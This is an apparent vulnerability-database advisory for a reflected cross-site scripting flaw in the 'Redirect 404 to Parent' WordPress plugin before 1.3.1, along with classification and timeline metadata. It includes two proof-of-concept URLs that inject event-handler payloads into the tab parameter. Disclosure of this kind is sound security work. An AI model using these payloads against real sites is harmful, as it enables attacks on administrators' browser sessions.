WordPress Plugin Vulnerabilities
Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)
Description
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
Proof of Concept
https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert(1); https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xB9
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-23 (about 3 years ago)
Added
2021-04-23 (about 3 years ago)
Last Updated
2021-04-24 (about 3 years ago)